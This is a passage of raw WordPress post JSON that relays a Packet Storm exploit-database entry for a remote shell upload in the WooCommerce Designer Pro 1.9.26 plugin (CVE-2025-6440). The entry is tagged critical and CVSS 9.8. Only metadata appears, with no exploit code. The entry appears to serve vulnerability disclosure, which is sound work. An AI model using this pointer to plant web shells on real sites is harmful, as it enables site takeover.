/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-06T18:47:18″,”description”:”WordPress WOOCOMMERCE Designer Pro plugin version 1.9.26 proof of concept remote shell upload exploit…”,”published”:”2026-02-06T00:00:00″,”modified”:”2026-02-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215066″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-6440″],”sourceData”:”=============================================================================================================================================\\n | # Title :…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-39478","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n